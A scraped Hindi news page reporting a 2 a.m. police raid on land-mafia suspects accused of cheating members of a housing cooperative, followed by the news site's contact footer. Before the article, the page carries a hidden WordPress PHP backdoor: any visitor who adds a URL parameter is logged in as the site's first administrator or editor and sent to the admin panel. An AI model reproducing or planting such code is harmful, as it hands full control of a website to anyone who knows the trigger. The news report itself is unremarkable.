// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); काली कमाई वालों के घर अंधेरे में दबिश:रात 2 बजे 200 पुलिसकर्मियों के साथ भू-माफिया के एक दर्जन ठिकानों पर दबिश; कई हिरासत में, 6 के खिलाफ केस दर्ज – प्रत्युषा आशा की नयी किरण
मध्यप्रदेश

काली कमाई वालों के घर अंधेरे में दबिश:रात 2 बजे 200 पुलिसकर्मियों के साथ भू-माफिया के एक दर्जन ठिकानों पर दबिश; कई हिरासत में, 6 के खिलाफ केस दर्ज

काली कमाई करने वालों के घर पुलिस-प्रशासन की टीम ने अंधेरी रात में दबिश दी। 200 से ज्यादा ज्यादा जवानों के साथ अधिकारियों ने करीब दर्जन जगहों पर दबिश दी और माफिया को दबोचा। यह सब हुआ है प्रदेश में चल रही भू-माफिया के खिलाफ मुहिम के कारण। पुलिस प्रशासन ने देर रात 2 बजे इस बड़ी कार्रवाई को अंजाम दिया है। कार्रवाई के दौरान शहर के अलग-अलग थाना क्षेत्रों से ऐसे भू माफिया को दबोचा गया है जो कि संस्था के नाम पर गरीबों को भूखंड देते थे फिर उनका रुपया डकार जाते थे। मामले में छह लोगों पर केस दर्ज किया गया है।

प्रशासन को लंबे समय से शिकायत मिल रही थी कि देवी अहिल्या श्रमिक कार्यकाल ग्रह निर्माण सहकारी संस्था के कई सदस्य रजिस्ट्री के बाद भी अपनी जमीन का मालिकाना हक अब तक नहीं मिला है। जिसमें लगातार शिकायत के बाद लगभग देर रात 2 बजे 200 से अधिक पुलिसकर्मियों ने एक दर्जन अलग-अलग जगह छापामार कार्रवाई की और कई माफिया को हिरासत में लिया।

पुलिस अधिकारी DIG मनीष कपूरिया ने बताया कि देर रात खजराना MIG थाना क्षेत्र द्वारा रात 2:00 बजे 200 से अधिक पुलिसकर्मियों द्वारा भू-माफिया की तलाश में छापेमारी कार्रवाई शुरू की गई> पुलिस के दल ने मनीष पूरी विजयनगर बिचोली पल्सीकर कॉलोनी में छापामार कार्रवाई की। इस दौरान CSP थाना प्रभारी सहित अन्य बल भी मौजूद था।

MIG TI विनोद दीक्षित की टीम ने मुकेश खत्री को विनय नगर से हिरासत में लिया है। एक अन्य टीम हैप्पी धवन के साकेत नगर के समीप स्थित निवास पर पहुंची, जहां देर रात छापेमारी कार्रवाई की गई।

यह है मामला

देवी अहिल्या श्रमिक कामगार ग्रह निर्माण सहकारी संस्था के पदाधिकारियों द्वारा अयोध्या पुरी कॉलोनी काटी गई थी, जिसमें 306 सदस्य हैं। इसमें अधिकांश को प्लाट मिल चुके हैं। 2006 में संस्था के रणवीर सिंह सूदन ने इस संस्था की जमीन में से 5 एकड़ अन्य कंपनी को बेच दी थी। इस कंपनी के डायरेक्टर दीपक जैन मुद्दा एक अन्य द्वारा जमीन को चार करोड़ ग्रुप में बेच दिया गया था, लेकिन जांच में पैसा संस्था में कोई हिसाब नहीं मिला। इसे लेकर लंबे समय से विवाद चल रहा था।

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड

[wp-rss-aggregator]